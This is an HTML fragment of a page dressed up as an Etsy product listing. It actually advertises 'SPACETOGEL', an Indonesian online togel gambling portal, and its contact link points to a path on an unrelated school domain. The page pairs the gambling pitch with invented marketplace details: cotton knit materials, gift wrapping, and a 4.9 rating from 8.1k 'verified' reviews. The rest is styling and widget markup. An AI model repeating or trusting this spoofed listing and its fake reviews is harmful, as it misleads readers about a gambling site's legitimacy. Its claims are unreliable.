    <div><span class="wt-icon wt-nudge-b-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M18.1 6c.7 1.7.9 3.6.4 5.6-.8 3.4-3.5 6.1-6.9 6.9-2 .5-3.9.2-5.6-.4v1.4L7.5 21h12l1.5-1.5v-12L19.5 6h-1.4z"/><path d="M9.5 2C5.4 2 2 5.4 2 9.5S5.4 17 9.5 17 17 13.6 17 9.5 13.6 2 9.5 2zM7.8 15c-.6-.2-1.2-.5-1.7-.9l8-8c.4.5.7 1.1.9 1.7L7.8 15zm3.4-11c.6.2 1.2.5 1.7.9l-8 8c-.4-.5-.7-1.1-.9-1.7L11.2 4zM9 3.8L3.8 9C4 6.2 6.2 4 9 3.8zm1 11.4l5.2-5.2c-.2 2.8-2.4 5-5.2 5.2z"/></svg></span></div>
    <div class="wt-width-full wt-max-width-full wt-ml-xs-1">
<div data-clg-id="WtInlineToggle" class="wt-content-toggle--truncated-inline-single wt-text-body-01">
    <div class="wt-content-toggle__trigger-wrapper">
        <button
                type="button"
                class="wt-content-toggle--ellipsis-btn"
                data-one-way="false"
                data-wt-content-toggle
                data-inline="single"
                aria-controls="legacy-materials-product-details"
        >
            <span class="etsy-icon wt-icon--base-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle cx="12" cy="12.001" r="2.999"/><circle cx="3" cy="12.001" r="2.999"/><circle cx="21" cy="12.001" r="2.999"/></svg></span>
            <span class="wt-screen-reader-only">Read the full description</span>
        </button>
    </div>

    <p id="legacy-materials-product-details" class="wt-text-truncate wt-text-body-01" >
                    Materials: Cotton, Knit

    </p>
</div>
    </div>
</li>
        
        
        
        <li class="wt-block-grid__item wt-display-flex-xs wt-align-items-flex-start">
    <div><span class="wt-icon wt-nudge-b-2"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><circle cx="6" cy="17" r="1"/><path d="M21.707 10.293L20.414 9l1.293-1.293c.39-.39.39-1.023 0-1.414l-1-1C20.52 5.105 20.267 5 20 5H10c0-2.206-1.794-4-4-4S2 2.794 2 5v12c0 2.206 1.794 4 4 4h14c.266 0 .52-.105.707-.293l1-1c.39-.39.39-1.023 0-1.414L20.414 17l1.293-1.293c.39-.39.39-1.023 0-1.414L20.414 13l1.293-1.293c.39-.39.39-1.023 0-1.414zM6 19c-1.103 0-2-.897-2-2s.897-2 2-2 2 .897 2 2-.897 2-2 2zm2-5.444C7.41 13.212 6.732 13 6 13s-1.41.212-2 .556V5c0-1.103.897-2 2-2s2 .897 2 2v8.556zm10.293-3.85L19.586 11l-1.293 1.293c-.39.39-.39 1.023 0 1.414L19.586 15l-1.293 1.293c-.39.39-.39 1.023 0 1.414L19.586 19H9.444c.344-.59.556-1.268.556-2V7h9.586l-1.293 1.293c-.39.39-.39 1.023 0 1.414z"/></svg></span></div>
        <div class="wt-ml-xs-1 wt-display-flex-xs wt-flex-wrap">
    <p class="wt-mr-xs-1">Gift wrapping available</p>
    <span class="wt-popover" data-wt-popover>
        <a tabindex="0" data-wt-popover-trigger data-gift-wrap-trigger class="wt-popover__trigger wt-popover__trigger--underline wt-display-inline-flex-xs wt-align-items-center" aria-describedby="item-highlights-gift-wrap-popover" aria-disabled="true">
            <span class="wt-text-caption">See details</span>
        </a>
        <span id="item-highlights-gift-wrap-popover" role="tooltip" class='giftwrap-popover wt-display-none'>
        <img
    data-clg-id="WtImage"
    class="wt-flex-xs-2 wt-rounded wt-image--cover wt-image"
    src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0"
    alt=""
    style="max-height: 150px; max-width: 150px; aspect-ratio: 1;"
    loading="lazy"
    sizes="(max-width: 639px) 150px, 300px"
    srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 200w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 300w, https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg?version=0 600w"
/>
</span>
    </span>
</div>
</li>
    </ul>
</div>
<div class="wt-mt-xs-2">
        <h1 style="font-size: 20px;">SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia</h1><br>

</div>

<div data-id="description-text">
    <div
        id="content-toggle-product-details-read-more"
        class="wt-content-toggle__body wt-content-toggle__body--truncated wt-content-toggle__body--truncated-02"
    >
        <p data-product-details-description-text-content class="wt-text-body-01 wt-break-word" style="text-align: justify
        ;">
            Di tengah semakin berkembangnya dunia hiburan online, SPACETOGEL hadir sebagai salah satu link toto togel resmi yang banyak dicari oleh para pecinta togel online. Dengan reputasi yang terus meningkat, SPACETOGEL dikenal sebagai portal yang menghubungkan pemain ke 10 situs togel terpercaya tahun 2026 dengan sistem aman, transparan, dan pelayanan profesional.
        </p>
        
    </div>
    </div>
</div>

            </div>
        </div>
    </div>
<div data-appears-component-name="did_you_know">
<div id="did_you_know">
    <div class="wt-content-toggle " data-selector="info-section-content-toggle">

<style>
/* === Animasi untuk #e0NMFoeIPOT2 === */
.is-in-view #e0NMFoeIPOT2_to {
  animation: e0NMFoeIPOT2_to__to 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT2_to__to {
  0% { transform: translate(44.162561px, 5.846695px); }
  8% { transform: translate(44.162561px, 5.846695px); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: translate(42.257336px, 6.69656px); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: translate(46.27px, 7.700005px); }
  36.5% { transform: translate(42.752561px, 5.5px); }
  48% { transform: translate(44.150002px, 6.297191px); }
  100% { transform: translate(44.150002px, 6.297191px); }
}

.is-in-view #e0NMFoeIPOT2_tr {
  animation: e0NMFoeIPOT2_tr__tr 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT2_tr__tr {
  0% { transform: rotate(-5deg); }
  8% { transform: rotate(-5deg); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: rotate(-7deg); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: rotate(7deg); }
  36.5% { transform: rotate(-5deg); }
  48% { transform: rotate(0deg); }
  100% { transform: rotate(0deg); }
}

/* === Animasi untuk #e0NMFoeIPOT5 === */
.is-in-view #e0NMFoeIPOT5_to {
  animation: e0NMFoeIPOT5_to__to 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT5_to__to {
  0% { transform: translate(4.2px, 5.697011px); }
  8% { transform: translate(4.2px, 5.697011px); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: translate(5.826704px, 6.546839px); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: translate(1.52px, 7.701463px); }
  36.5% { transform: translate(5.294274px, 5.6px); }
  48% { transform: translate(3.85px, 6.297191px); }
  100% { transform: translate(3.85px, 6.297191px); }
}

.is-in-view #e0NMFoeIPOT5_tr {
  animation: e0NMFoeIPOT5_tr__tr 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT5_tr__tr {
  0% { transform: rotate(5deg); }
  8% { transform: rotate(5deg); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: rotate(7deg); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: rotate(-7deg); }
  36.5% { transform: rotate(5deg); }
  48% { transform: rotate(0deg); }
  100% { transform: rotate(0deg); }
}

/* === Animasi untuk #e0NMFoeIPOT8 === */
.is-in-view #e0NMFoeIPOT8_to {
  animation: e0NMFoeIPOT8_to__to 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT8_to__to {
  0% { transform: translate(28.52px, 15.1px); }
  8% { transform: translate(28.52px, 15.1px); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: translate(26.96px, 16.52px); animation-timing-function: cubic-bezier(0.284467, 0, 0.625227, 0.383992); }
  18.5% { transform: translate(27.14px, 16.214055px); animation-timing-function: cubic-bezier(0.310382, 0.25506, 0.719913, 0.848254); }
  19.5% { transform: translate(27.3px, 15.96px); }
  20.5% { transform: translate(27.47px, 15.63px); }
  22.5% { transform: translate(27.96px, 14.98px); }
  24.5% { transform: translate(28.46px, 14.3px); }
  27% { transform: translate(29.004407px, 13.613261px); animation-timing-function: cubic-bezier(0.36087, 0.641427, 0.696459, 1); }
  28% { transform: translate(29.07px, 13.52px); }
  28.5% { transform: translate(28.952353px, 13.590588px); }
  30% { transform: translate(28.55px, 13.84px); }
  31% { transform: translate(28.3px, 14px); }
  32% { transform: translate(28.13px, 14.18px); }
  33% { transform: translate(27.85px, 14.3px); }
  33.5% { transform: translate(27.776555px, 14.35px); }
  34% { transform: translate(27.6px, 14.4px); }
  34.5% { transform: translate(27.540925px, 14.5px); }
  35.5% { transform: translate(27.305294px, 14.6px); }
  36.5% { transform: translate(27.07px, 14.72px); }
  48% { transform: translate(27.765359px, 14.148534px); }
  100% { transform: translate(27.765359px, 14.148534px); }
}

.is-in-view #e0NMFoeIPOT8_tr {
  animation: e0NMFoeIPOT8_tr__tr 2000ms linear 1 normal forwards;
}
@keyframes e0NMFoeIPOT8_tr__tr {
  0% { transform: rotate(-5deg); }
  8% { transform: rotate(-5deg); animation-timing-function: cubic-bezier(0.15, 0, 1, 1); }
  16.5% { transform: rotate(-7deg); animation-timing-function: cubic-bezier(0.25, 0, 0.75, 1); }
  28% { transform: rotate(7deg); }
  36.5% { transform: rotate(-5deg); }
  48% { transform: rotate(0deg); }
  100% { transform: rotate(0deg); }
}
</style>

    <g id="e0NMFoeIPOT2_to" transform="translate(44.162561,5.846695)">
        <g id="e0NMFoeIPOT2_tr" transform="rotate(-5)">
            <g transform="translate(-44.150002,-6.29719)">
                <path d="M34.7,33.1l4.4-4.4c4.8-4.8,4.8-12.6,0-17.4v0c-4-4-10.1-4.9-14.7-2.1L17.7,15l17,18.1Z" fill="#4d6bc6"/>
                <path d="M36.5,33.5l-2.2-2.2l3.6-3.6c4.2-4.2,4.2-11,0-15.2C34.4,9,29,8.4,25.1,10.8L23.5,8.2C28.6,5,35.6,5.8,40.1,10.3c5.4,5.4,5.4,14.2,0,19.6l-3.6,3.6Z" fill="#222"/>
            </g>
        </g>
    </g>
    <g id="e0NMFoeIPOT5_to" transform="translate(4.2,5.697011)">
        <g id="e0NMFoeIPOT5_tr" transform="rotate(5)">
            <g transform="translate(-3.85,-6.297191)">
                <path d="M40.5,25.2l-4.8-4.8v0l-9-9c-4.8-4.8-12.6-4.8-17.4,0s-4.9,12.6-.1,17.4L15.4,35v0l4.4,4.4c1.2,1.2,3.2,1.2,4.4,0s1.2-3.2,0-4.4l-1.7-1.7l3.9,3.9c1.2,1.2,3.2,1.2,4.4,0s1.2-3.2,0-4.4l1.1,1.1c1.2,1.2,3.2,1.2,4.4,0v0c1.2-1.2,1.2-3.2,0-4.4l-4.9-4.9v0l4.9,4.9c1.2,1.2,3.2,1.2,4.4,0c1-1.2,1-3.1-.2-4.3Z" fill="#d7e6f5"/>
                <path d="M42.7,27.4c0-1.2-.5-2.4-1.4-3.3l-4.8-4.8v0l-9-9c-5.4-5.4-14.2-5.4-19.6,0s-5.4,14.2,0,19.6l6.2,6.2v0l4.4,4.4c.9.9,2.1,1.3,3.3,1.3s2.4-.4,3.3-1.3c.4-.4.7-.9,1-1.5.7.4,1.5.6,2.3.6c1.2,0,2.4-.4,3.3-1.3.6-.6,1-1.3,1.2-2c.3.1.7.1,1,.1c1.2,0,2.4-.5,3.3-1.4.8-.8,1.3-1.9,1.3-3c1.1-.1,2.2-.5,3-1.3.7-.9,1.2-2.1,1.2-3.3Zm-3.6,1.1c-.6.6-1.6.6-2.2,0l-7.6-7.6L27.2,23l7.6,7.6c.6.6.6,1.6,0,2.2s-1.6.6-2.2,0l-1.1-1.1L25,25.2l-2.2,2.2l6.5,6.5c.6.6.6,1.6,0,2.2s-1.6.6-2.2,0L25,33.9l-4.4-4.4-2.2,2.2l4.4,4.4c.6.6.6,1.6,0,2.2s-1.6.6-2.2,0l-1.9-1.9v0L10,27.7c-4.2-4.2-4.2-11,0-15.2s11-4.2,15.2,0l6.2,6.2v0L39,26.3c.3.3.5.7.5,1.1.1.4-.1.8-.4,1.1Z" fill="#222"/>
            </g>
        </g>
    </g>
    <g id="e0NMFoeIPOT8_to" transform="translate(28.52,15.1)">
        <g id="e0NMFoeIPOT8_tr" transform="rotate(-5)">
            <g transform="translate(-27.765359,-14.148534)">
                <path d="M32.3,15.1L23,19.8c-1.7,1.2-4.2.8-5.4-.9v0c-1.2-1.7-.8-4.1.9-5.4c2.1-1.5,4.7-3.4,5.6-3.9C28.7,6.7,35,7.4,39,11.4v0" fill="#4d6bc6"/>
                <path d="M19.4,14.7l1.9-1.4c1-.7,2-1.4,2.7-1.9.4-.3.7-.5.9-.6.7-.4,1.4-.7,2.1-.9c3.7-1.2,8-.3,10.9,2.6l2.2-2.2c-4.2-4.2-10.9-5.2-16-2.5-.3.1-.5.3-.8.4-.4.3-1.3.9-2.3,1.6-.5.3-.9.7-1.4,1l-1.9,1.4c-2.4,1.7-3,5.1-1.3,7.5.8,1.2,2.1,2,3.5,2.2.3.1.6.1.9.1c1.1,0,2.2-.3,3.1-1l5.9-4.1l2.6-1.8-2.2-2.2-2.6,1.8-5.4,3.8c-.5.4-1.1.5-1.7.4s-1.1-.4-1.5-1c-.9-1-.6-2.5.4-3.2Z" fill="#222"/>
            </g>
        </g>
    </g>
</svg></span>
        </div>
    </div>    
</div>
</div>

 </div>


            <div class=" wt-mt-xs-1" data-region="seller-details-captcha">
                <div class="g-recaptcha-etsy"
     data-sitekey="6LdLaJ4dAAAAAJ7wEqcouvMBPRU1ssOPOcYYzPJQ"
     data-etsy-autoload="false"
     data-recaptcha-version="enterprise"
     data-recaptcha-key-type="checkbox"
     id="g-recaptcha-etsy-shop_seller_details-checkbox"
     data-badge="inline"
     data-recaptcha-action="shop_seller_details"
>
</div>
<div class="wt-alert wt-alert--inline wt-alert--error-01 wt-display-none js-recaptcha-load-error">
       <p class="wt-text-body-01">Captcha failed to load. Try using a different browser or disabling ad blockers.</p>
</div>
<input id="g-recaptcha-etsy-shop_seller_details-checkbox-input"
       type="hidden"
       name="enterprise_recaptcha_token"
       value=""
/>
<input id="g-recaptcha-etsy-shop_seller_details-checkbox-input-key-type"
       type="hidden"
       name="enterprise_recaptcha_token_key_type"
       value="checkbox"
/>
            </div>

<div data-clg-id="WtOverlay" class="wt-overlay wt-overlay--info wt-overlay--has-close-icon" id="reg-seller-details-overlay" aria-hidden="true" aria-modal="false" role="dialog" aria-label="This is an overlay with regulatory seller details" data-wt-overlay>
    <div class="wt-overlay__modal" data-overlay-modal>
            <button type="button" class="wt-btn wt-btn--transparent wt-btn--icon wt-overlay__close-icon wt-btn--light"  aria-label="Close" data-wt-overlay-close>
                <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M13.414,12l6.293-6.293a1,1,0,0,0-1.414-1.414L12,10.586,5.707,4.293A1,1,0,0,0,4.293,5.707L10.586,12,4.293,18.293a1,1,0,1,0,1.414,1.414L12,13.414l6.293,6.293a1,1,0,0,0,1.414-1.414Z"/></svg></span>
            </button>
                    <div class="wt-overflow-y-auto" id="seller-details--inner-container">
<div data-clg-id="WtOverlayHeader" class="wt-overlay__header" >
                        <h2 class="wt-text-heading">Seller details </h2>

</div>
                    <p class="wt-mb-xs-2" id="seller-details-trader-info">
                    </p>


                    <div class="wt-mb-xs-4">
                        <h3 class="wt-text-title-large">
                            Business registration number
                        </h3>
                        <p id="seller-details-reg-number" class="wt-mb-xs-2 wt-mt-xs-2">
                        </p>
                    </div>

                    <div class="wt-mb-xs-4">
                            <h3 class="wt-text-title-large">
                                Location
                            </h3>
                            <p id="seller-details-addresss" class="wt-mb-xs-2 wt-mt-xs-2">
                            </p>
                    </div>


                <div class="wt-mb-xs-2">
                    <p class="wt-mb-xs-2 wt-mt-xs-2">
                        Need to get in touch with the seller? Try <a
    rel="nofollow"
    href="https://ppschool.org.in/stella/messages/new?with_id=386926495&referring_id=25947065&referring_type=shop&recipient_id=386926495&from_action=contact-seller"
    
    class="wt-display-inline-block contact-action convo-overlay-trigger inline-overlay-trigger"
    role="button"
    data-to_username="SPACETOGEL"
    data-to_user_id="386926495"
    data-to_user_display_name="SPACETOGEL"
        data-referring_type="shop"
        data-referring_id="25947065"
    
    data-subject=""
    data-message=""
    
    aria-label="messaging them"
>
    
    
    <span>messaging them</span> 
    
    
</a>  on SPACETOGEL first.
                    </p>
                </div>
            </div>

    </div>
  </div>
</div>


                    <div class="listing-info wider-review-col wt-order-xs-6">
    <div
        class="wt-flex-lg-5 wt-align-items-flex-start wt-max-width-full wt-pl-md-4 wt-pr-md-4 wt-pr-lg-0 wt-pl-lg-5 wt-pl-xs-2 wt-pr-xs-2"
        data-appears-component-name="listing_page_reviews_container_top"
        data-offset="0.01"
    >
        <div class="wt-mb-xs-3">
            <div data-lazy-loaded-bottom-section-before-reviews-trigger></div>
            <div data-appears-component-name="listing_page_reviews">
<div data-reviews-container id="reviews"
     class="wt-align-items-flex-start wt-mb-xs-6 wt-mb-lg-9">
    <div data-appears-component-name="reviews_header">
<div class="wt-display-flex-xs wt-align-items-center wt-flex-wrap wt-mb-xs-2 wt-mt-xs-2 wt-mt-md-0 wt-justify-content-space-between wt-flex-gap-xs-2">
  <div>
    <div class="wt-display-flex-xs wt-align-items-center">
      <span class="wt-icon wt-fill-beeswax wt-nudge-b-1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M14.782 8.676 12 2.145l-2.78 6.53-7.086.625 5.364 4.663-1.595 6.918L12 17.228l6.097 3.653-1.596-6.919L21.867 9.3z"/></svg></span>
      <p class="wt-text-title-large wt-nudge-l-2">4.9 out of 5</p>
      <p class="wt-text-body-large wt-ml-xs-2 wt-text-gray">(8.1k reviews)</p>
    </div>
    <p class="wt-text-body-small wt-sem-text-secondary">All reviews are from verified buyers</p>
  </div>
  <div class="wt-display-flex-xs wt-align-items-center wt-flex-gap-sm-2 wt-flex-gap-xs-3 wt-justify-content-space-between wt-flex-grow-xs-1 wt-flex-grow-md-0">
      <div class="wt-display-flex-xs wt-align-items-center wt-flex-xs-1">
        <span class="rating-score fill-5 wt-flex-shrink-xs-0">
          <span class="rating-value wt-text-title-small">
            5/5
          </span>
        </span>
        <span class="rating-label wt-text-body-smaller">Item quality</span>
      </div>
      <div class="wt-display-flex-xs wt-align-items-center wt-flex-xs-1">
        <span class="rating-score fill-5 wt-flex-shrink-xs-0">
          <span class="rating-value wt-text-title-small">
            5/5
          </span>
        </span>
        <span class="rating-label wt-text-body-smaller">Shipping</span>
      </div>
      <div class="wt-display-flex-xs wt-align-items-center wt-flex-xs-1">
        <span class="rating-score fill-5 wt-flex-shrink-xs-0">
          <span class="rating-value wt-text-title-small">
            5/5
          </span>
        </span>
        <span class="rating-label wt-text-body-smaller">Customer service</span>
      </div>
  </div>
</div>
</div>

    
    <div data-clg-id="WtSpinner" class="wt-spinner wt-spinner--02 wt-display-none" aria-live="assertive" data-reviews-pagination-loading-spinner="">
        <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 48 48" aria-hidden="true" focusable="false"><circle fill="transparent" cx="24" cy="24" r="21"/></svg></span>
        Loading
    </div>


    <div data-reviews>
        <div class="wt-mb-xs-3">
                <div class="wt-mt-xs-3 wt-mt-md-4 wt-mb-xs-3 wt-mb-md-2">
                    <div data-appears-component-name="reviews_feature_tags" data-appears-event-data='{"num_tags":18}'>
<div
    data-reviews-feature-tags
    data-listing-id="4302118744"
    class="wt-b-xs wt-b-md-none wt-rounded-02 wt-p-xs-2 wt-p-md-0 wt-display-flex-xs wt-flex-wrap wt-flex-gap-xs-2"
>
    <span class="wt-display-flex-xs wt-align-items-center wt-flex-gap-xs-1 wt-width-full-xs wt-width-auto-md">
        <span class="etsy-icon wt-icon--smaller-xs wt-flex-shrink-xs-0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="m15.4 14.1-3.7-1.9-1.8-3.6c-.3-.7-1.4-.7-1.8 0l-1.9 3.7-3.7 1.9c-.3.1-.5.4-.5.8q0 .6.6.9l3.7 1.9 1.9 3.7c.1.3.4.5.8.5q.6 0 .9-.6l1.9-3.7 3.7-1.9c.3-.2.6-.5.6-.9s-.3-.6-.7-.8m6-8L19 4.9l-1.2-2.4c-.3-.7-1.4-.7-1.8 0l-1.2 2.4-2.4 1.2c-.2.2-.4.5-.4.9q0 .6.6.9L15 9.1l1.2 2.4c.2.3.5.6.9.6q.6 0 .9-.6l1.2-2.4 2.4-1.2c.2-.2.4-.5.4-.9q0-.6-.6-.9"/></svg></span>
        <span class="wt-text-title-small">Buyer highlights, summarized by Grey</span>
    </span>
    <div class="wt-display-flex-xs wt-flex-direction-row-xs wt-flex-wrap">
            <span data-tag="Great quality" data-tag-type="Informative" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Great quality
            </span>
            <span data-tag="Lovely" data-tag-type="Expressive" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Lovely
            </span>
            <span data-tag="Fast shipping" data-tag-type="Informative" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Fast shipping
            </span>
            <span data-tag="Gift-worthy" data-tag-type="Informative" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Gift-worthy
            </span>
            <span data-tag="Beautiful" data-tag-type="Expressive" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Beautiful
            </span>
            <span data-tag="As described" data-tag-type="Informative" class="wt-text-body-small--tight wt-br-xs wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                As described
            </span>
            <span data-tag="Cute" data-tag-type="Expressive" class="wt-text-body-small--tight wt-mt-xs-1 wt-mb-xs-1 wt-pl-xs-2 wt-pr-xs-2">
                Cute
            </span>
    </div>
</div>
</div>
                </div>



                <div class="wt-display-flex-xs wt-justify-content-space-between wt-mt-md-1">
                    <div class="wt-max-width-full">
                        <div data-appears-component-name="reviews_categorical_tags" data-appears-event-data='{"num_tags":10}'>
<div data-reviews-categorical-tags data-listing-id="4302118744" class="wt-position-relative tag-scroller">
    <div data-reviews-categorical-tags-container class="categorical_tags wt-pl-xs-1 wt-pt-xs-2 wt-pb-xs-2 wt-pt-md-3 wt-pb-md-3 wt-pr-xs-2 wt-mr-xs-1 wt-z-index-1 wt-overflow-x-auto">
<div data-clg-id="WtChipGroup" class="wt-chip-group wt-display-flex-xs wt-flex-nowrap" role="group" aria-labelledby="571a23e0-13e0-424c-af45-27deb0783e04">
  <span class="wt-screen-reader-only" id="571a23e0-13e0-424c-af45-27deb0783e04">Filter by category</span>
  <div class="wt-chip-group__container wt-display-flex-xs wt-flex-nowrap">
    <button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Quality" data-tag-type="Categorical"
  aria-label="Quality"
  aria-pressed="false"
  
  >
    
                      Quality (90)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Shipping &amp; Packaging" data-tag-type="Categorical"
  aria-label="Shipping & Packaging"
  aria-pressed="false"
  
  >
    
                      Shipping & Packaging (60)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Appearance" data-tag-type="Categorical"
  aria-label="Appearance"
  aria-pressed="false"
  
  >
    
                      Appearance (50)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Description accuracy" data-tag-type="Categorical"
  aria-label="Description accuracy"
  aria-pressed="false"
  
  >
    
                      Description accuracy (48)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Seller service" data-tag-type="Categorical"
  aria-label="Seller service"
  aria-pressed="false"
  
  >
    
                      Seller service (19)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Sizing &amp; Fit" data-tag-type="Categorical"
  aria-label="Sizing & Fit"
  aria-pressed="false"
  
  >
    
                      Sizing & Fit (10)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Value" data-tag-type="Categorical"
  aria-label="Value"
  aria-pressed="false"
  
  >
    
                      Value (9)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Comfort" data-tag-type="Categorical"
  aria-label="Comfort"
  aria-pressed="false"
  
  >
    
                      Comfort (8)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Ease of use" data-tag-type="Categorical"
  aria-label="Ease of use"
  aria-pressed="false"
  
  >
    
                      Ease of use (2)

</button>
<button 
  data-clg-id="WtSelectableChip"
  type="button"
  class="wt-btn wt-chip wt-flex-shrink-xs-0 wt-chip--small wt-flex-shrink-xs-0 wt-flex-shrink-xs-0"
  data-tag="Condition" data-tag-type="Categorical"
  aria-label="Condition"
  aria-pressed="false"
  
  >
    
                      Condition (1)

</button>

  </div>
</div>    </div>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-btn--icon wt-btn--small cat_tags_prev wt-position-absolute wt-position-left wt-z-index-2 wt-p-xs-0 wt-hide-xs" aria-label="Scroll previous" data-reviews-categorical-tags-previous="">
                <span class="wt-icon wt-icon--smaller-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M16 21.002a1 1 0 0 1-.664-.253L5.5 12.002l9.841-8.748a1 1 0 0 1 1.328 1.494L8.5 12.002l8.159 7.252A1 1 0 0 1 16 21.002"/></svg></span>

</button>
<button data-clg-id="WtButton" class="wt-btn wt-btn--transparent wt-btn--icon wt-btn--small cat_tags_next wt-position-absolute wt-position-right wt-z-index-2 wt-p-xs-0" aria-label="Scroll next" data-reviews-categorical-tags-next="">
                <span class="wt-icon wt-icon--smaller-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M8 21a1 1 0 0 1-.664-1.747l8.164-7.254-8.164-7.252a1 1 0 0 1 1.328-1.494L18.5 12l-9.836 8.747A1 1 0 0 1 8 21"/></svg></span>

</button>
</div>
</div>
                    </div>
                    <div class="wt-flex-shrink-xs-0 wt-display-flex-xs wt-justify-content-flex-end wt-align-items-center">
                        <div class="wt-display-flex-xs wt-justify-content-flex-end"
>
    <div data-clg-id="WtMenu" class="wt-menu " data-wt-menu id="sort-reviews-menu" data-hide-trigger-on-open="false" data-animate-in="true" data-close-on-select="true" data-contain-focus="false" data-open-direction-vert="bottom" data-open-direction-horiz="left" data-open-direction-force="false" data-menu-type="option">
            <button data-clg-id="WtMenuTrigger" type="button" class="wt-menu__trigger wt-btn wt-btn--transparent wt-btn--small sort-reviews-trigger" aria-haspopup="true" aria-expanded="false" data-wt-menu-trigger >
        <span class="wt-menu__trigger__label">Suggested</span>
        <span class="wt-icon wt-menu__trigger__caret"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><polygon points="16.5 10 12 16 7.5 10 16.5 10"/></svg></span>
</button>
<div data-clg-id="WtMenuBody" role="menu" class="wt-menu__body " data-wt-menu-body >
                <button data-clg-id="WtMenuItem" type="button" role="menuitemradio" class="wt-menu__item wt-is-selected reviews-sort-by-item" tabindex="-1" data-sort-option="Relevancy" aria-checked="true">
     Suggested 
</button>

            <button data-clg-id="WtMenuItem" type="button" role="menuitemradio" class="wt-menu__item reviews-sort-by-item" tabindex="-1" data-sort-option="Recency" aria-checked="false">
     Most recent 
</button>

            <button data-clg-id="WtMenuItem" type="button" role="menuitemradio" class="wt-menu__item reviews-sort-by-item" tabindex="-1" data-sort-option="Highest" aria-checked="false">
     Highest Rating 
</button>

